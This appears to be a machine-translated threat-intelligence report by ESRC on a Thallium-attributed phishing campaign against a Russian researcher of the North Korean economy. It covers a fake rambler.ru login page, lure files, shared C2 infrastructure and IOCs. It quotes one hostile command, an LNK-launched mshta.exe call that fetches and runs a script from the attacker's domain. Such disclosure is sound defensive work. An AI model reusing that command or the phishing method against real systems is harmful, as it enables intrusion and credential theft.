apt37

Thallium cyber attack against Russian researchers working in North Korean economy

Introduction

In the process of monitoring the threat activity of the Thallium organization, known to be affiliated with the North Korean authorities, ESRC caught an attempted email hacking attack against a senior researcher at the Center for Korean Studies at the Far East Institute of the Russian Academy of Sciences in Moscow.

The threat actor created a specific short URL address using the’Short URL generator’ service, and it was determined that the actual address below was used in the attack.

● dnsservice.esy[.]es/session-error-active/rambler.ru/config/?id=ludmila_hph&ath=kpp.pdf (93.188.160.77)

clip_image002

[Figure 1] Phishing link creation through shortened URL service

The short URL “surl[.]me/zsu7” seems to have been used as an email link, and when the recipient clicks the link, a login screen pretending to be Russian rambler.ru service is displayed.

clip_image004

[Figure 2] Russian rambler.ru email impersonation login screen

The elaborately crafted fake login screen has an e-mail address of’[email protected]’, and you can see that it is the account of a real person through a search.

He is a senior researcher at the Center for Korean Studies at the Far Eastern Institute of the Russian Academy of Sciences in Moscow, his main research areas are North Korea’s economy, North Korea’s foreign economic relations, inter-Korean economic relations, and economic relations between Russia and North Korea and South Korea.

Liudmila Zakharova (Institute of Far Eastern Studies, Russian Academy of Sciences)

clip_image006

[Figure 3] Part of’ideas.repec.org/a/kap/asiaeu/v18y2020i3d10.1007_s10308-019-00544-4.html’

Returning to the point of view, if the recipient is tricked by the fake email login screen and enters the actual password, the password is leaked to the attacker’s server, while the following is a normal PDF document that is printed out to deceive the victim from being recognized.

● dnsservice.esy[.]es/session-error-active/rambler.ru/content/kpp.pdf (93.188.160.77)

clip_image008

[Figure 4] Normal PDF Russian document screen

If you check the Russian content of the PDF document with Google translation, it is as follows, and the contents of the crisis in Korea are shown.

clip_image010

[Figure 5] Russian Google translation screen in normal PDF document

ESRC researchers identified several interesting points in the course of investigating the attack, although the threat actor used a Russian IP (94.242.58.64) address, but the band matched the VPN (Hide All IP) service used by the Thallium organization in the past. .

And it was the same with the web browser, which the thallium organization frequently uses.

clip_image012

[Figure 6] Threat actor activity log screen

The’dnsservice.esy.es’ address used in this threat activity has been exposed in several APT attacks in the past.

– dnsservice.esy[.]es/software1/down.php?file=xsrv

– dnsservice.esy [.] es / www.zip

clip_image014

[Figure 7] Inside xsrv.zip compressed file and batch file command

All of these malicious files appeared in a case of attacking a specific person in Korea in 2019 using a portal email service in Korea. At that time, the email was decorated as if the document’application form.pdf’ was attached, and when the recipient clicks the link, the’application form.zip’ file was downloaded.

● upsrv.16mb[.]com/fie/down.php?file=Application form.zip (93.188.160.77)

clip_image015

[Figure 8] Malicious email and downloaded compressed file screen

In the compressed file of the application form, a shortcut file of’Application form.lnk’ is included, and the path to be executed is configured so that the following command works. Through this, it communicates with the’dnsservice.esy[.]es’ server.

%windir%\system32\mshta.exe http://dnsservice.esy[.]es/upda.php

Through this process , upsrv.16mb [.] COM “link , you can see that is connected to dnsservice.esy [.] Es’ address. And the’dnsservice.esy[.]es/document/11.pdf’ file is opened through the’upda.php’ command, and the’www.zip’ file is called and executed.

clip_image016

[Figure 9] Shortcut file setting screen

” Upsrv.16mb [.] COM” For the address, but also a variety of historical incidents, typically a particular target for professional media coverage in the North sector ‘ DPRK the Human Rights.zip the practices’ exist,’ upgradesrv.890m[.]com ‘ address has been used in similar attacks.

● upsrv.16mb[.]com/dta/down.php?file=DPRK Human Rights.zip

● upgradesrv.890m[.]com/data/down.php?file=Kim, Putin have high hopes for their 1st one-on-one meeting.exe

● upgradesrv.890m[.]com/back/2019/index.php=MOU – Contribution Agreement with Ministry of Unification.exe

At the time of 2019, registered various bait files on the’dnsservice.esy[.]es’ server, but mainly North and South Korean documents were used, and some files were replaced later.

clip_image018

[Figure 10] Various bait files registered on the attacker’s server

The typical addresses used in the command control (C2) server are as follows, and you can confirm that all IP addresses are the same.

Domain addressIP address
dnsservice.esy [.] es93.188.160.77
upsrv.16mb [.] com93.188.160.77
upgradesrv.890m [.] with93.188.160.77
documentserver[.]site93.188.160.77

What is interesting here is a malicious MS Word DOC document file associated with the’documentserver[.]site’ address. This malicious file, discovered in December 2020, contains content written in Indonesian language, and VBS The file is created and called.

clip_image020

[Figure 11] Inside screen of VBS file created from malicious DOC document

That by the VBS script command ‘ documentserver [.] Site’ will be to communicate to the server. The’op=5′ factor type used here is similar to the Thallium organization’s Smoke Screen campaign.

The name of the creator of this malicious doc document is’Mickey’ account, and a test file with the North Korean font’KP CheongPong’ was found in another doc document file created at the same time and created name. Done.

clip_image022

[Figure 12] Document screen containing the North Korean font Cheongbong

Common threat actors often use test documents before creating malicious documents.

clip_image024clip_image026
clip_image028clip_image030

In addition, ESRC researchers focused on registrants of the’documentserver[.]site’ domain and were able to find out the relationship with other similar attacks.

The registration date of the domain is March 30, 2020, and the name of the registrant is’aoler jack’. And the email used for registration was’[email protected]’ Russian address.

And the phone number is registered as +82.12035386476, the country code of +82 international calls means Korea.

clip_image032

[Figure 13]’documentserver[.]site’ domain registration information

Similarities were found in a number of domains registered by the attacker, and in 2020, it was possible to check the history of use by disguised as a domestic N portal company domain. And these organizations are characterized by active use of overseas web hosting services for a long time.

Of course, there are cases of hacking domestic and international web servers or signing up for a free/paid server hosting service to use as a server.

Domain NameCreation DateEmailRegistrarIP
emailnaver [.] com2020-10-09[email protected]publicdomainregistry.com93.188.160.77
nicnaver [.] com2020-08-14[email protected]publicdomainregistry.com93.188.160.77
mysoftazure [.] com2019-10-11[email protected]hostinger.com93.188.160.77
proattachfile [.] com2019-04-22[email protected]hostinger.com93.188.160.77
softfilemanage [.] com2018-03-27[email protected]hostinger.com31.170.161.28

The East Security ESRC has confirmed that the threat activity of the Thallium organization is continuing, and has confirmed that it is also conducting hacking attacks against Russia as well as Korea and the United States.

IOCs

93.188.160.77
dnsservice.esy[.]es
documentserver[.]site
upgradesrv.890m[.]com
upsrv.16mb[.]com